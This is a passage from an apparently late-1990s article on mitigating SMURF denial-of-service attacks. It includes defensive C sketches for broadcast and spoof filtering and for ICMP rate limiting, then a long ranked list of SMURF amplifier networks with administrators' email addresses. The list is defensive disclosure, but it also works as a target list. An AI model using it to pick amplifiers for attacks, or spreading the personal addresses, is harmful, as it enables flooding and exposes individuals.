     origination of SMURF attacks, but also makes tracking attacks (or denying origination of attacks) much easier.
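
     The two router-side measures described above (refusing directed broadcasts into connected subnets, and RFC2267-style source filtering
     on traffic leaving the local network), sketched in C as an added example; it is not code from the NORDUnet article or from any router.
     The prefixes are constructed documentation addresses and the function names are hypothetical.

```c
#include <arpa/inet.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* One locally connected subnet, in host byte order. */
struct prefix {
    uint32_t net;
    int      len;       /* mask length, 0..32 */
};

enum verdict { FORWARD, DROP_DIRECTED_BCAST, DROP_SPOOFED_SRC };

/* Constructed sample: the subnets behind a hypothetical border router. */
static const struct prefix LOCAL[] = {
    { 0xC0000200u, 24 },        /* 192.0.2.0/24    */
    { 0xC6336400u, 25 },        /* 198.51.100.0/25 */
};
#define NLOCAL (sizeof LOCAL / sizeof LOCAL[0])

static uint32_t mask_of(int len)
{
    return len == 0 ? 0u : 0xffffffffu << (32 - len);
}

static int in_prefix(uint32_t addr, const struct prefix *p)
{
    return (addr & mask_of(p->len)) == (p->net & mask_of(p->len));
}

/* A destination is a directed broadcast for subnet p when its host bits are
 * all ones, or all zeros (the legacy broadcast form some stacks still answer).
 * The test needs the real mask: ".255" alone says nothing, and .127 is a
 * broadcast address on a /25. */
int is_directed_broadcast(uint32_t dst, const struct prefix *p)
{
    uint32_t host = ~mask_of(p->len);

    if (p->len >= 31 || !in_prefix(dst, p))     /* /31 and /32: no broadcast */
        return 0;
    return (dst & host) == host || (dst & host) == 0;
}

/* inbound != 0: packet arrives from outside, headed for the local subnets.
 * inbound == 0: packet leaves the local subnets for the outside world. */
enum verdict filter(uint32_t src, uint32_t dst, int inbound)
{
    size_t i;

    if (inbound) {
        /* Amplifier-side fix: never turn a routed packet into a LAN broadcast. */
        for (i = 0; i < NLOCAL; i++)
            if (is_directed_broadcast(dst, &LOCAL[i]))
                return DROP_DIRECTED_BCAST;
        return FORWARD;
    }
    /* Source-network fix (RFC2267): only our own addresses may leave.
     * The destination is not judged here because the remote mask is unknown,
     * which is why the remote router has to apply the check above itself. */
    for (i = 0; i < NLOCAL; i++)
        if (in_prefix(src, &LOCAL[i]))
            return FORWARD;
    return DROP_SPOOFED_SRC;
}

/* Convenience wrapper for dotted-quad text; returns -1 on a malformed address. */
int check(const char *src, const char *dst, int inbound)
{
    struct in_addr s, d;

    if (inet_pton(AF_INET, src, &s) != 1 || inet_pton(AF_INET, dst, &d) != 1)
        return -1;
    return filter(ntohl(s.s_addr), ntohl(d.s_addr), inbound);
}

int main(void)
{
    static const char *name[] = { "forward", "drop (directed broadcast)",
                                  "drop (spoofed source)" };

    printf("in  -> 192.0.2.255      %s\n", name[check("203.0.113.9", "192.0.2.255", 1)]);
    printf("in  -> 198.51.100.127   %s\n", name[check("203.0.113.9", "198.51.100.127", 1)]);
    printf("in  -> 192.0.2.10       %s\n", name[check("203.0.113.9", "192.0.2.10", 1)]);
    printf("out src 192.0.2.10      %s\n", name[check("192.0.2.10", "203.0.113.255", 0)]);
    printf("out src 203.0.113.9     %s\n", name[check("203.0.113.9", "203.0.113.255", 0)]);
    return 0;
}
```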

     Since SMURF attacks use forged source addresses, tracking SMURF attacks back to their source can be a challenge. It has to be done while the
     attack is ongoing, and requires the swift cooperation of all the network service providers along the path. In practice this has proven to be quite
     difficult. Instead, what we have done in NORDUnet is to set a rate-limit on the volume of ICMP Echo Reply traffic we allow into NORDUnet. This
     is so that we can "soften" the effect of an attack originated outside of NORDUnet directed at a host inside NORDUnet.
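
     A token bucket is one common way to build such a rate limit; the article does not say which mechanism NORDUnet used. The C sketch
     below is an added example, not NORDUnet's configuration: it meters only ICMP Echo Reply packets, and the rate (32000 bytes/s),
     burst (8000 bytes) and flood timings are constructed values.

```c
#include <stdint.h>
#include <stdio.h>

#define PROTO_ICMP       1      /* IP protocol number of ICMP */
#define TYPE_ECHO_REPLY  0      /* ICMP type 0 */

/* Token bucket held in milli-bytes, so (bytes/s * ms) stays exact integer math. */
struct policer {
    uint64_t rate_Bps;          /* sustained rate, bytes per second */
    uint64_t burst_mB;          /* bucket depth, milli-bytes */
    uint64_t tokens_mB;         /* current fill, milli-bytes */
    uint64_t last_ms;           /* time of the last refill */
};

void policer_init(struct policer *p, uint64_t rate_Bps, uint64_t burst_bytes)
{
    p->rate_Bps  = rate_Bps;
    p->burst_mB  = burst_bytes * 1000;
    p->tokens_mB = p->burst_mB;         /* start full: a normal burst passes */
    p->last_ms   = 0;
}

/* Returns 1 to forward the packet, 0 to drop it. Only Echo Replies are
 * metered; everything else (TCP, UDP, Echo Requests) is left alone, so the
 * limit does not touch ordinary traffic to the protected hosts. */
int police(struct policer *p, uint64_t now_ms, int proto, int icmp_type,
           uint32_t len)
{
    uint64_t cost = (uint64_t)len * 1000;

    if (proto != PROTO_ICMP || icmp_type != TYPE_ECHO_REPLY)
        return 1;

    p->tokens_mB += (now_ms - p->last_ms) * p->rate_Bps;
    if (p->tokens_mB > p->burst_mB)
        p->tokens_mB = p->burst_mB;
    p->last_ms = now_ms;

    if (p->tokens_mB < cost)
        return 0;                       /* over the limit: drop */
    p->tokens_mB -= cost;
    return 1;
}

/* Constructed flood: `count` Echo Replies of `len` bytes, one per millisecond
 * from start_ms on. Returns how many of them the policer lets through. */
unsigned flood(struct policer *p, uint64_t start_ms, unsigned count,
               uint32_t len)
{
    unsigned i, passed = 0;

    for (i = 0; i < count; i++)
        passed += police(p, start_ms + i, PROTO_ICMP, TYPE_ECHO_REPLY, len);
    return passed;
}

int main(void)
{
    struct policer p;
    unsigned passed;

    policer_init(&p, 32000, 8000);
    passed = flood(&p, 0, 1000, 1000);  /* one second, 1000 x 1000 bytes */
    printf("echo replies forwarded during flood: %u of 1000\n", passed);
    printf("TCP segment during flood:            %s\n",
           police(&p, 999, 6, 0, 1500) ? "forwarded" : "dropped");
    printf("single reply one second later:       %s\n",
           police(&p, 2000, PROTO_ICMP, TYPE_ECHO_REPLY, 64) ? "forwarded" : "dropped");
    return 0;
}
```

     The limit softens the flood rather than stopping it: replies within the configured rate still reach the target, and a legitimate
     Echo Reply that arrives mid-flood competes for the same tokens.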

     For more detailed instructions as to how to take precautionary measures see Craig A. Huegen's page describing SMURF attacks. There is also an
     informal SMURF Amplifier Registry housed by the Norwegian ISP PowerTech, which in the form of a "hall of shame" lists active amplifier
     networks. It might be a good idea to check that your network is not on this list.
     
     http://netscan.org/lamers-r-us.html - Lists the current 2048 top smurf amplifiers, sample list below
     
     And the following information:
     
          Current top ten smurf amplifiers (updated every 5 minutes)
          (last update: 1999-08-04 20:31:03 CET)

          Network             #Dups  #Incidents  Registered at     Home AS           
          208.248.240.0/24      123           0  1999-07-31 22:49  not-analyzed      
          208.239.162.0/24       97           0  1999-07-28 00:15  not-analyzed      
          208.6.8.0/24           93           0  1999-07-28 00:34  not-analyzed      
          208.166.201.0/24       89           0  1999-01-19 07:13  AS4181            
          4.5.255.0/24           79           0  1999-07-14 12:35  not-analyzed      
          204.96.225.0/24        73           0  1998-06-22 17:46  AS3594            
          192.0.0.0/2            73           0  1999-01-04 06:39  not-analyzed      
          128.0.0.0/1            73           0  1999-01-28 02:36  not-analyzed      
          209.0.233.0/24         73           0  1999-04-28 23:45  AS3356            
          194.170.181.0/24       72           0  1998-10-24 09:42  AS5384            

          110536 networks have been probed with the SAR
          19684 of them are currently broken
          13338 have been fixed after being listed here
                                             
     comes from a Norwegian site, http://www.powertech.no/smurf/
     
                                                  
     Smurf Amplifier List (Is your network on this list??)
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     http://netscan.org/lamers-r-us.html


     Note that it's also possible to see the # of replies for any network. Head to the main page and
     punch in an IP. 

     Last rescan: Wed Jul 14 20:00:57 EDT 1999


     40       206.27.80.0        abettsak@sinfo.net
     40       208.140.202.255    admin@sinfo.net
     40       209.137.126.0      hostmaster@icix.net
     40       207.49.79.0        abettsak@sinfo.net
     39       148.83.4.0
     39       194.8.193.0        mruesel@netcologne.de, akb@netcologne.de,
                                 jsommerberg@netcologne.de
     39       195.145.123.255    lick@ron.de
     39       200.17.53.0        gomide@nic.br
     39       203.139.106.255    hostmaster@nic.ad.jp
     39       203.179.212.255    hostmaster@nic.ad.jp
     39       204.179.253.0      dpinder@appliedcom.com
     39       204.179.253.255    dpinder@appliedcom.com
     39       204.84.29.0        hostmaster@ncren.net
     39       204.88.64.0
     39       204.97.19.255      hostmaster@top.monad.net
     39       205.221.193.0      rparis@ihcc.cc.ia.us
     39       206.157.64.0       abettsak@sinfo.net
     39       209.133.61.255     noc@above.net
     39       208.237.105.0      rwilhe@luk-us.com
     39       208.152.187.0      stokes@aris.net
     39       208.152.187.255    stokes@aris.net
     39       208.3.167.255      nomailbox@nowhere
     39       208.201.184.0      nomailbox@nowhere
     38       63.64.107.0        jshelnutt@ispalliance.net
     38       63.64.107.255      jshelnutt@ispalliance.net
     38       192.239.136.0      pete@rayleigh.tt.aftac.gov
     38       192.239.136.255    pete@rayleigh.tt.aftac.gov
     38       193.128.20.0
     38       193.128.21.0
     38       193.128.21.255
     38       193.6.21.255       net-admin@sztaki.hu, dns-admin@hungarnet.hu
     38       198.64.21.255      hostmaster@sesqui.net
     38       198.64.22.0        hostmaster@sesqui.net
     38       199.244.182.0
     38       200.16.176.0       nomailbox@nowhere
     38       202.251.136.0      hostmaster@nic.ad.jp
     38       204.116.225.0
     38       204.116.225.255
     38       204.116.226.0
     38       204.116.226.255
     38       204.116.33.0       richard.colgate@sunbelt.net
     38       204.116.33.255     richard.colgate@sunbelt.net
     38       206.126.151.255    pete@altadena.net
     38       208.218.96.0       mitch@gvtc.com
     38       208.218.97.0       mitch@gvtc.com
     38       208.218.96.255     mitch@gvtc.com
     38       207.177.41.0       noc@netins.net
     38       207.177.41.255     noc@netins.net
     38       209.85.102.0       hostmaster@softaware.com
     38       209.85.103.255     jweis@softaware.com
     38       207.67.228.255     Dave@pacificcolor.com
     38       207.196.111.0      hostmaster@clark.net
     38       207.224.201.0      dlongar@uswest.net
     38       209.64.2.0         info@netradio.net
     38       206.206.103.255    Beeson@technet.nm.org
     38       209.175.161.255    wdahlen@mail.isbe.state.il.us
     38       206.176.39.0       sbrost@mystic.bhsu.edu
     38       206.176.39.255     sbrost@mystic.bhsu.edu
     38       206.191.216.255    nomailbox@nowhere
     37       193.128.20.255
     37       193.188.61.255     kha@knpc.com.kw, hmb@knpc.com.kw
     37       195.20.88.0        103023.2047@compuserve.com,
                                 hostmaster@OMNILINK.NET
     37       195.20.88.255      hostmaster@omnilink.net,
                                 103023.2047@compuserve.com
     37       195.38.102.255     thomas@tvnet.hu, adi@tvnet.hu
     37       199.244.182.255
     37       203.238.129.255    mgr@nownuri.net, ip@nownuri.net
     37       204.254.80.255     keith@dcna.com
     37       204.48.142.255     tuma@ceo.sbceo.k12.ca.us
     37       204.48.223.0       tuma@ceo.sbceo.k12.ca.us
     37       204.69.110.255     wong@accesscom.net
     37       205.223.148.255    dale@roadrunner.admin.leon.k12.fl.us
     37       207.123.253.255    mullauer@umms-itg.ab.umd.edu
     37       207.67.228.0       Dave@pacificcolor.com
     37       206.191.225.0      hostmaster@spacestar.net
     37       216.101.17.0       cpuccetti@advmedicine.com
     37       207.214.141.255    kgibbs@porterville.k12.ca.us
     37       209.163.146.0
     37       206.206.103.0      Beeson@technet.nm.org
     37       208.237.105.255    rwilhe@luk-us.com
     37       210.84.0.0         net-ops@list.ozemail.com.au
     37       209.3.41.0         noc@iconnet.net
     37       209.201.116.0      support@iconnet.net
     37       209.3.40.255       noc@iconnet.net
     37       209.201.116.255    support@iconnet.net
     37       209.201.119.255    support@iconnet.net
     37       216.168.235.0      cwei@netsol.com
     37       216.168.235.255    cwei@netsol.com
     37       209.144.168.255    ggillespie@currents.net
     37       216.12.37.255      dns@cfw.com
     37       209.149.248.0      ipadmin@bellsouth.net
     37       209.240.85.0       mury@goldengate.net
     37       209.240.85.255     mury@goldengate.net
     37       208.2.250.255      nomailbox@nowhere
     36       193.0.84.0         Marcin.Gromisz@fuw.edu.pl,
                                 Michal.Jankowski@fuw.edu.pl
     36       194.68.198.0
     36       199.105.221.0      dns@cerf.net
     36       199.178.74.0       hostmaster@ameritech.net
     36       202.99.41.0
     36       202.99.48.0
     36       202.99.48.255
     36       204.181.85.255     jbuchle@staktek.com
     36       204.211.80.0       hostmaster@sips.state.nc.us
     36       204.228.78.255     cgarner@sni.net
     36       204.69.110.0       wong@accesscom.net
     36       205.138.50.0       ipswip@cw.net
     36       205.138.50.255     ipswip@cw.net
     36       205.213.134.255    frcr@ltc.tec.wi.us
     36       205.213.135.255    frcr@ltc.tec.wi.us
     36       205.253.192.0      karl@mcs.com
     36       205.253.192.255    karl@mcs.com
     36       212.48.2.255       carlo.gualandri@matrix.it, melli@matrix.it
     36       207.13.165.255     NOC@sprint.net
     36       207.214.141.0      kgibbs@porterville.k12.ca.us
     36       210.208.167.0      tonyyuan@mail.my.net.tw
     36       216.88.175.0       scotts@blairlake.com
     36       210.208.167.255    tonyyuan@mail.my.net.tw
     36       210.78.152.0       hlqian@ns.cnc.ac.cn, mao@cnnic.cn,
                                 whzhang@cnnic.cn, dl@cnnic.net.cn
     36       210.78.153.0       hlqian@ns.cnc.ac.cn, mao@cnnic.cn,
                                 whzhang@cnnic.cn, dl@cnnic.net.cn
     36       210.78.158.0       hlqian@ns.cnc.ac.cn, mao@cnnic.cn,
                                 whzhang@cnnic.cn, dl@cnnic.net.cn
     36       210.78.152.255     hlqian@ns.cnc.ac.cn, mao@cnnic.cn,
                                 whzhang@cnnic.cn, dl@cnnic.net.cn
     36       210.78.153.255     hlqian@ns.cnc.ac.cn, mao@cnnic.cn,
                                 whzhang@cnnic.cn, dl@cnnic.net.cn
     36       210.78.154.255     hlqian@ns.cnc.ac.cn, mao@cnnic.cn,
                                 whzhang@cnnic.cn, dl@cnnic.net.cn
     36       210.78.155.255     hlqian@ns.cnc.ac.cn, mao@cnnic.cn,
                                 whzhang@cnnic.cn, dl@cnnic.net.cn
     36       210.78.158.255     hlqian@ns.cnc.ac.cn, mao@cnnic.cn,
                                 whzhang@cnnic.cn, dl@cnnic.net.cn
     36       216.94.82.255      nhermes@adexpress.ca
     36       207.66.244.0       pat@wolfe.net
     36       209.201.118.0      support@iconnet.net
     36       209.201.118.255    support@iconnet.net
     36       207.13.164.255     NOC@sprint.net
     36       209.149.248.255    ipadmin@bellsouth.net
     36       209.152.141.255    domain@slip.net
     35       192.160.217.255    greenup@whittier.edu
     35       192.174.35.0
     35       192.204.204.0      jacobs@mail.dp.upenn.edu
     35       192.204.204.255    jacobs@mail.dp.upenn.edu
     35       194.57.84.0        Patrice.Koch@univ-fcomte.fr
     35       195.90.31.255      guardian@isb.net, nerge@isb.net
     35       199.186.145.255    hostmaster@attmail.com
     35       200.17.53.255      gomide@nic.br
     35       200.25.18.0        lcgomez@b-manga.cetcol.net.co
     35       204.0.135.255      hostmaster@sesqui.net
     35       204.254.150.0      postmaster@arn.net
     35       204.254.150.255    postmaster@arn.net
     35       204.48.142.0       tuma@ceo.sbceo.k12.ca.us
     35       204.48.223.255     tuma@ceo.sbceo.k12.ca.us
     35       205.164.166.0      mjg@writeme.com
     35       205.213.128.0      frcr@ltc.tec.wi.us
     35       205.213.132.0      frcr@ltc.tec.wi.us
     35       205.213.135.0      frcr@ltc.tec.wi.us
     35       206.0.199.255      hostinfo@psi.com
     35       207.163.229.255    hostmaster@alameda-coe.k12.ca.us
     35       207.13.164.0       NOC@sprint.net
     35       207.214.142.255    kgibbs@porterville.k12.ca.us
     35       207.123.250.255    mullauer@umms-itg.ab.umd.edu
     35       207.25.98.0        noc@ans.net
     35       207.10.165.0       rcm@mmc.marymt.edu
     35       210.208.166.0      tonyyuan@mail.my.net.tw
     35       207.10.165.255     rcm@mmc.marymt.edu
     35       210.78.154.0       hlqian@ns.cnc.ac.cn, mao@cnnic.cn,
                                 whzhang@cnnic.cn, dl@cnnic.net.cn
     35       210.78.155.0       hlqian@ns.cnc.ac.cn, mao@cnnic.cn,
                                 whzhang@cnnic.cn, dl@cnnic.net.cn
     35       210.78.159.0       hlqian@ns.cnc.ac.cn, mao@cnnic.cn,
                                 whzhang@cnnic.cn, dl@cnnic.net.cn
     35       207.136.233.0      topher@madriver.com
     35       206.247.11.255     rkd@rmi.net
     35       216.214.168.255    noc@megsinet.net
     35       216.64.150.255     hostmaster@gsti.net
     35       216.84.9.0         netadmin@southernet.net
     35       209.85.170.0       hostmaster@softaware.com
     35       209.85.170.255     hostmaster@softaware.com
     35       207.13.165.0       NOC@sprint.net
     35       209.163.147.255    alan@waldenweb.com
     35       209.39.59.0        netadmin@onramp.net
     34       24.217.1.255       mczakaria@chartercom.com
     34       152.3.144.255      rdc@netcom.duke.edu
     34       192.173.9.0        gandrews@drc.com
     34       193.252.125.255    postmaster@wanadoo.fr, abuse@wanadoo.fr,
                                 Sylvain.Causse@wanadoo.com
     34       195.202.143.0      herbert.voegl@kabsi.at, chris@streams.at,
                                 christian.steger@indis.at
     34       195.90.31.0        guardian@isb.net, nerge@isb.net
     34       198.188.181.0      nes@4c.net
     34       199.119.8.255      http://103536.3617@compuserve.com
     34       202.78.157.0       ken@clearview.co.nz, bobg@clearview.co.nz
     34       203.155.160.0      chatree@ram1.ru.ac.th, admin@ns.ksc.co.th
     34       203.95.7.255       zao@stn.sh.cn, sqian@fudan.edu.cn
     34       205.152.12.255     ipadmin@bellsouth.net
     34       205.169.211.0      postmaster@garfield.k12.co.us
     34       205.213.132.255    frcr@ltc.tec.wi.us
     34       205.216.169.0      sei@vidpbx.com
     34       205.216.169.255    sei@vidpbx.com
     34       209.63.149.255     cbrown@advanced-power.com
     34       207.163.229.0      hostmaster@alameda-coe.k12.ca.us
     34       212.48.2.0         carlo.gualandri@matrix.it, melli@matrix.it
     34       208.154.15.255     ron@syrworldnet.com
     34       207.149.39.255     brett@pond.net
     34       208.154.15.0       ron@syrworldnet.com
     34       207.214.142.0      kgibbs@porterville.k12.ca.us
     34       207.100.159.0      hostmaster@icix.net
     34       216.214.168.0      noc@megsinet.net
     34       209.3.130.255      wkrug@atlnet.org
     34       209.132.105.0      garyq@wpds.com
     34       209.167.171.255    chris@tntech.com
     34       209.152.182.255    domain@slip.net
     34       209.144.168.0      ggillespie@currents.net
     34       208.225.130.255    lbutrick@awr.com
     34       209.135.222.255    mromm@kivex.com
     33       24.66.63.0         internet.abuse@shaw.ca
     33       152.3.144.0        rdc@netcom.duke.edu
     33       198.97.78.0        postmaster@algo.net
     33       199.103.248.0      dnsmaster@terra.net
     33       202.102.30.0       dmkou@publicf.bta.net.cn,
       pearl.m@public1.ptt.js.cn
     33       202.102.30.255     dmkou@publicf.bta.net.cn,
       pearl.m@public1.ptt.js.cn
     33       203.127.167.0
     33       203.127.167.255
     33       204.130.67.255
     33       204.152.57.255     allen.arthur@oak.doe.gov
     33       204.186.98.255     dns-request@ptd.net
     33       204.192.47.0       noc@digex.net
     33       204.32.135.0       Louis_Lee@icgcomm.com
     33       204.32.135.255     Louis_Lee@icgcomm.com
     33       205.165.50.0       RIDDLE@twu.edu
     33       205.165.50.255     RIDDLE@twu.edu
     33       205.230.191.0      bob@new-york.net
     33       206.0.199.0        hostinfo@psi.com
     33       206.141.16.255     lak@aads.net
     33       206.148.48.255     Wong@callaway.com
     33       207.149.39.0       brett@pond.net
     33       210.17.1.0         dengwei@access.ttn.com.tw
     33       216.103.204.0      ip-admin@pbi.net
     33       209.233.209.0      ip-admin@pbi.net
     33       209.80.138.0       tom_plati@wellesley.mec.edu
     33       207.100.159.255    hostmaster@icix.net
     33       216.103.205.255    ip-admin@pbi.net
     33       209.149.4.0        ipadmin@bellsouth.net
     33       207.109.43.0       dns-info@uswest.net
     33       207.16.219.255     help@uunet.uu.net
     33       209.201.119.0      support@iconnet.net
     33       209.47.228.0       chris@tntech.com
     33       216.88.175.255     scotts@blairlake.com
     33       207.96.71.0        domreg@erols.com
     33       208.158.116.0      nomailbox@nowhere
     32       63.65.8.255        twright@cathedral.org
     32       140.237.20.0       lauer@merl.com
     32       140.237.20.255     lauer@merl.com
     32       192.211.32.255     sawise@mindspring.com, wise@widedata.com
     32       194.229.106.0
     32       194.78.210.0       jfs@skynet.be
     32       194.78.210.255     jfs@skynet.be
     32       194.78.211.0       jfs@skynet.be
     32       194.78.211.255     jfs@skynet.be
     32       195.232.126.0      hostmaster@wcom.net
     32       198.142.200.255    matt@mpx.com.au
     32       198.6.49.0         aperry@symantec.com
     32       198.6.49.255       aperry@symantec.com
     32       199.186.145.0      hostmaster@attmail.com
     32       199.98.170.255     hostinfo@psi.com
     32       200.132.7.255      gomide@nic.br
     32       203.155.175.255    chatree@ram1.ru.ac.th, admin@ns.ksc.co.th
     32       204.130.67.0
     32       204.130.69.0
     32       204.220.140.0      hostmaster@computerpro.com
     32       204.220.140.255    hostmaster@computerpro.com
     32       204.220.141.0      hostmaster@computerpro.com
     32       204.220.141.255    hostmaster@computerpro.com
     32       204.220.142.0      nomailbox@nowhere
     32       204.220.142.255    nomailbox@nowhere
     32       205.211.53.255     teha@algonquinc.on.ca
     32       206.17.97.0        dns@cerf.net
     32       209.63.148.255     cbrown@advanced-power.com
     32       207.246.134.0      edmond@flyingcroc.com
     32       207.246.143.0      webmaster@redchicken.com
     32       207.246.134.255    edmond@flyingcroc.com
     32       207.246.143.255    webmaster@redchicken.com
     32       216.101.17.255     cpuccetti@advmedicine.com
     32       209.32.51.0        nomailbox@nowhere
     32       207.224.249.0      dlongar@uswest.net
     32       209.32.51.255      nomailbox@nowhere
     32       210.208.166.255    tonyyuan@mail.my.net.tw
     32       207.196.81.0       hostmaster@clark.net
     32       207.17.200.0       avnet@radicalmedia.com
     32       209.135.192.0
     32       207.66.244.255     pat@wolfe.net
     32       206.74.159.0       mckee@admin.infoave.net
     32       206.74.159.255     mckee@admin.infoave.net
     32       209.79.52.0        marc@service.com
     32       206.215.195.0      jdecryberry@cupnb.com
     32       209.47.228.255     chris@tntech.com
     32       209.7.241.0        djurewic@lth3.k12.il.us
     32       208.13.18.255      nomailbox@nowhere
     32       206.23.197.255     jwinters@tec.net
     31       152.3.228.0        rdc@netcom.duke.edu
     31       152.3.228.255      rdc@netcom.duke.edu
     31       192.160.217.0      greenup@whittier.edu
     31       193.188.61.0       kha@knpc.com.kw, hmb@knpc.com.kw
     31       194.167.45.0       bdulmet@ens2m.fr
     31       194.209.156.0      hostmaster@screenlight.ch
     31       194.209.156.255    hostmaster@screenlight.ch
     31       194.252.70.0       jarmo.miettinen@sonera.fi, matti.aarnio@tele.fi
     31       194.68.198.255
     31       199.111.79.0       jaj@virginia.edu
     31       202.101.127.0
     31       202.102.13.0       dmkou@publicf.bta.net.cn,
                                 pearl.m@public1.ptt.js.cn
     31       202.102.32.0       dmkou@publicf.bta.net.cn,
                                 pearl.m@public1.ptt.js.cn
     31       202.102.32.255     dmkou@publicf.bta.net.cn,
                                 pearl.m@public1.ptt.js.cn
     31       202.247.6.0        hostmaster@nic.ad.jp
     31       203.180.182.0      hostmaster@nic.ad.jp
     31       203.180.182.255    hostmaster@nic.ad.jp
     31       203.182.48.0       hostmaster@nic.ad.jp
     31       203.238.131.0      mgr@nownuri.net, ip@nownuri.net
     31       204.32.80.255      bille@petersons.com
     31       205.185.160.0      Louis_Lee@icgcomm.com
     31       205.231.58.255     help@uunet.uu.net
     31       205.232.18.255     denz@ria.org
     31       206.163.24.255     spencer@bendnet.com
     31       207.137.159.255    netops@4d.net
     31       206.23.197.0       jwinters@tec.net
     31       210.145.24.0       hostmaster@nic.ad.jp
     31       210.17.1.255       dengwei@access.ttn.com.tw
     31       216.50.134.0       technical@kivex.com
     31       208.241.46.255     slokuge@2launch.com
     31       208.168.246.255    kenwhit@remc8.k12.mi.us
     31       209.133.94.255     noc@above.net
     31       216.111.166.255    noc@qwest.net
     31       206.64.4.0         jba@genx.net
     31       208.196.34.255     jimj@rp-l.com
     31       206.23.195.255     jwinters@tec.net
     31       212.86.0.0         Teemu.Anttila@verkkotieto.com
     31       208.212.74.0       espencer@globix.com
     31       212.86.0.255       Teemu.Anttila@verkkotieto.com
     31       208.212.74.255     espencer@globix.com
     31       208.10.133.0       nomailbox@nowhere
     31       216.168.160.255    talal@vipcalling.com
     31       216.168.160.0      talal@vipcalling.com
     31       207.215.238.255    jaykata@ltsc.org
     31       216.168.161.0      talal@vipcalling.com
     31       209.3.40.0         noc@iconnet.net
     31       209.39.24.255      netadmin@onramp.net
     31       209.10.126.0       hostmaster@globix.net
     31       207.244.119.255    nitromed@shore.net
     31       208.29.189.0       nomailbox@nowhere
     31       208.168.231.0      bjoyce@remc8.k12.mi.us
     31       208.168.231.255    bjoyce@remc8.k12.mi.us
     30       63.64.128.255      info@schwablearning.org
     30       166.45.5.0         hostmaster@mci.net
     30       166.45.5.255       hostmaster@mci.net
     30       192.174.35.255
     30       193.120.12.0       noc@esat.net
     30       193.120.12.255     noc@esat.net
     30       193.170.126.0      m.mauerkirchner@mail.htl-leonding.ac.at,
                                 m.mauerkirchner@mail.asn-linz.ac.at,
                                 Karoly.Erdei@risc.uni-linz.ac.at,
                                 Karoly.Erdei@risc.uni-linz.ac.at
     30       193.67.180.0       joppe.van.der.reijden@veronica.nl,
                                 luuk@veronica.nl
     30       194.93.134.255     mcarr@intensive.net, j.baker@intensive.net
     30       195.141.0.0        robert.jones@sunrise.ch, peter.zopfi@sunrise.ch,
                                 stefan.thoma@sunrise.ch
     30       195.232.126.255    hostmaster@wcom.net
     30       198.112.56.255     mikem@cw.com
     30       198.243.153.0      dtorbet@jonesinternet.com
     30       198.25.218.0       JWELLS@gi-link.dcrb.dla.mil
     30       198.76.85.0        dmcginni@ndu.edu
     30       198.76.85.255      dmcginni@ndu.edu
     30       199.111.105.0      jaj@virginia.edu
     30       199.111.105.255    jaj@virginia.edu
     30       199.182.135.0      hostmaster@maxstrat.com
     30       199.183.164.0      Louis_Lee@icgcomm.com
     30       199.249.19.255     paul.weber@mci.com
     30       199.72.94.0        hostmaster@interpath.net
     30       199.72.95.0        hostmaster@interpath.net
     30       199.72.95.255      hostmaster@interpath.net
     30       202.102.13.255     dmkou@publicf.bta.net.cn,
                                 pearl.m@public1.ptt.js.cn
     30       202.232.119.0      hostmaster@nic.ad.jp
     30       202.36.35.0
     30       203.110.2.0        philip@voyager.co.nz, mat@voyager.co.nz
     30       203.110.2.255      philip@voyager.co.nz, mat@voyager.co.nz
     30       203.238.131.255    mgr@nownuri.net, ip@nownuri.net
     30       203.98.1.0         philip@voyager.co.nz, aitken@fruean.com
     30       203.98.38.0        dsharples@oibunzl2.telstra.com.au
     30       204.168.184.255    bill.russell@nyu.edu
     30       204.178.107.255    danny@akamai.com
     30       204.178.110.0      danny@akamai.com
     30       204.178.110.255    aperry@symantec.com
     30       204.32.80.0        bille@petersons.com
     30       205.232.18.0       denz@ria.org
     30       206.23.195.0       jwinters@tec.net
     30       209.49.144.255     jamie@itribe.net
     30       207.86.190.255     dns@digex.net
     30       206.205.105.0      noc@digex.net
     30       216.168.242.0      cwei@netsol.com
     30       216.168.242.255    cwei@netsol.com
     30       210.236.10.255     hostmaster@nic.ad.jp
     30       209.220.50.255     hostmaster@concentric.net
     30       208.167.146.255    lpowers@eastky.net
     30       208.227.145.0      spell@wilmington.net
     30       216.50.134.255     technical@kivex.com
     30       208.227.144.255    spell@wilmington.net
     30       206.6.19.0         hostinfo@psi.com
     30       209.220.50.0       hostmaster@concentric.net
     30       209.140.163.0      darin@good.net
     30       209.140.163.255    darin@good.net
     30       207.245.26.255     NOCToronto@metronet.ca
     30       208.217.4.0        norrg001@gold.tc.umn.edu
     30       207.110.28.0       kit@connectnet.com
     30       209.76.0.0         aleph1@dfw.net
     30       209.76.1.0
     30       209.76.2.0         aleph1@dfw.net
     30       208.228.215.0      jsutherlin@pacificcolor.com
     30       208.228.215.255    jsutherlin@pacificcolor.com
     30       209.226.73.0       noc@in.bell.ca
     30       209.226.73.255     noc@in.bell.ca
     30       207.96.117.0       domreg@erols.com
     30       207.96.117.255     domreg@erols.com
     30       207.212.182.255    ip-admin@pbi.net
     30       208.157.105.255    ipadmin@desupernet.net
     30       209.79.52.255      marc@service.com
     30       206.225.61.255     kenneth@jump.net
     30       208.201.184.255    nomailbox@nowhere
     30       208.2.250.0        nomailbox@nowhere
     29       143.213.220.0      MILLARDD@shafter-emh3.army.mil
     29       143.213.251.0      MILLARDD@shafter-emh3.army.mil
     29       161.223.163.0
     29       167.199.168.0      jda51@state.ga.us
     29       168.234.39.0       mmorales@concyt.gob.gt
     29       192.190.131.255    Annie.Renard@inria.fr
     29       193.0.80.0         Marcin.Gromisz@fuw.edu.pl,
                                 Michal.Jankowski@fuw.edu.pl
     29       193.188.81.0
     29       193.188.81.255
     29       193.52.99.0        tchou@narech.dnet.circe.fr,
       jacky.gabriel@sciences.univ-nantes.fr,
       jacky.gabriel@sciences.univ-nantes.fr
     29       193.52.99.255      tchou@narech.dnet.circe.fr,
       jacky.gabriel@sciences.univ-nantes.fr,
       jacky.gabriel@sciences.univ-nantes.fr
     29       194.151.42.255     beheer@a1.nl
     29       194.205.160.0      support@insnet.net
     29       194.207.107.255    andy@openworld.co.uk
     29       194.79.131.255     support@internext.fr, sam@internext.fr
     29       194.79.163.0       lgadot@nbo.fr
     29       194.79.163.255     lgadot@nbo.fr
     29       194.79.164.0       support@internext.fr, sam@internext.fr
     29       194.79.164.255     support@internext.fr, sam@internext.fr
     29       199.182.135.255    hostmaster@maxstrat.com
     29       199.183.165.255    Louis_Lee@icgcomm.com
     29       199.72.140.255     hostmaster@interpath.net
     29       200.16.176.255     nomailbox@nowhere
